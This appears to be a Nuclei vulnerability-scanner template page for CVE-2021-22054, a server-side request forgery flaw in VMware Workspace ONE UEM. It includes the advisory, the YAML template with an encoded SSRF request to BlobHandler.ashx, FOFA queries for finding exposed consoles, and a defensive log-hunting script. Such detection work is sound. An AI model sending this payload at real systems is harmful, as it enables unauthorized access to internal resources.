VMWare Workspace ONE UEM - Server-Side Request Forgery
ID: CVE-2021-22054
Severity: high
Author: h1ei1
Tags: cve2021,cve,vmware,workspace,ssrf
Description
VMware Workspace ONE UEM console 20.0.8 prior to 20.0.8.37, 20.11.0 prior to 20.11.0.40, 21.2.0 prior to 21.2.0.27, and 21.5.0 prior to 21.5.0.37 contain a server-side request forgery vulnerability. This issue may allow a malicious actor with network access to UEM to send their requests without authentication and to gain access to sensitive information.
YAML Source
id: CVE-2021-22054

info:
  name: VMWare Workspace ONE UEM - Server-Side Request Forgery
  author: h1ei1
  severity: high
  description: VMware Workspace ONE UEM console 20.0.8 prior to 20.0.8.37, 20.11.0 prior to 20.11.0.40, 21.2.0 prior to 21.2.0.27, and 21.5.0 prior to 21.5.0.37 contain a server-side request forgery vulnerability. This issue may allow a malicious actor with network access to UEM to send their requests without authentication and to gain access to sensitive information.
  impact: |
    An attacker can exploit this vulnerability to send crafted requests to internal resources, potentially leading to unauthorized access or information disclosure.
  remediation: |
    Apply the necessary patches or updates provided by VMWare to fix the vulnerability.
  reference:
    - https://blog.assetnote.io/2022/04/27/vmware-workspace-one-uem-ssrf/
    - https://www.vmware.com/security/advisories/VMSA-2021-0029.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-22054
    - https://github.com/fardeen-ahmed/Bug-bounty-Writeups
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-22054
    cwe-id: CWE-918
    epss-score: 0.7582
    epss-percentile: 0.98174
    cpe: cpe:2.3:a:vmware:workspace_one_uem_console:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: vmware
    product: workspace_one_uem_console
    fofa-query:
      - banner="/AirWatch/default.aspx" || header="/AirWatch/default.aspx"
      - banner="/airwatch/default.aspx" || header="/airwatch/default.aspx"
  tags: cve2021,cve,vmware,workspace,ssrf

http:
  - method: GET
    path:
      - "{{BaseURL}}/Catalog/BlobHandler.ashx?Url=YQB3AGUAdgAyADoAawB2ADAAOgB4AGwAawBiAEoAbwB5AGMAVwB0AFEAMwB6ADMAbABLADoARQBKAGYAYgBHAE4ATgBDADUARQBBAG0AZQBZAE4AUwBiAFoAVgBZAHYAZwBEAHYAdQBKAFgATQArAFUATQBkAGcAZAByAGMAMgByAEUAQwByAGIAcgBmAFQAVgB3AD0A"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Interactsh Server"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100a49bac16ac67995970f908873b7570df88d2df957cb199acd40dd0e80620f2c60220681fee2efb1cfa705c4a6f8592b77f7c14d485bea9b6c39303627b1356bb34d6:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-22054.yaml"
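
For defenders who want to look back through their own console's web logs, the request the template sends (a GET to `/Catalog/BlobHandler.ashx` with a `Url` parameter) can be hunted for directly. The following is an added example, not part of the template or of Nuclei. It assumes the console's web tier writes IIS W3C extended logs; the log lines, client addresses and `Url`/`Id` values are constructed.

```python
from collections import defaultdict
from urllib.parse import parse_qs

HANDLER = "/catalog/blobhandler.ashx"  # path probed by the template, lower-cased

# Constructed IIS W3C log excerpt (documentation IP ranges, dummy parameter values).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2022-05-01 10:00:01 GET /AirWatch/default.aspx - 198.51.100.7 200
2022-05-01 10:00:05 GET /Catalog/BlobHandler.ashx Url=QQBBAEEAQQA= 203.0.113.9 200
2022-05-01 10:00:09 GET /catalog/blobhandler.ashx Url=QgBCAEIAQgA= 203.0.113.9 500
2022-05-01 10:01:00 GET /Catalog/BlobHandler.ashx Id=5 198.51.100.7 200
"""

def hunt(log_text):
    """Return {client_ip: [(timestamp, status), ...]} for handler requests carrying Url=."""
    fields, hits = [], defaultdict(list)
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column layout can change mid-file
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        # IIS paths are case-insensitive, so compare lower-cased.
        if row.get("cs-uri-stem", "").lower() != HANDLER:
            continue
        query = {k.lower() for k in parse_qs(row.get("cs-uri-query", ""))}
        if "url" not in query:
            continue
        ts = f'{row.get("date", "")} {row.get("time", "")}'.strip()
        hits[row.get("c-ip", "?")].append((ts, int(row.get("sc-status", 0))))
    return dict(hits)

def served(hits):
    """Client IPs that received at least one 200, the status the template matches on."""
    return sorted(ip for ip, reqs in hits.items() if any(s == 200 for _, s in reqs))

if __name__ == "__main__":
    found = hunt(SAMPLE_LOG)
    for ip, reqs in found.items():
        print(ip, reqs)
    print("answered with 200:", served(found))
```

Treat each hit as a lead to triage against known client addresses and the console's patch level, not as proof of exploitation.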